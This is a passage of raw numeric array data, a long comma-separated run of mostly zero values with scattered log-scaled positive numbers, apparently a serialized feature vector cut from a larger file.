0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.828313737302301, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.0841946160253872, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 18.468344649580203, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 3.4011973816621555, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.871201010907891,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.2188758248682006, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 4.356708826689592, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0,\n 0.6931471805599453, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 6.2166061010848646, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.394449154672439, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.649511027115099, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.238324625039507, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.081404364984463, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, \n 0.6931471805599453, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 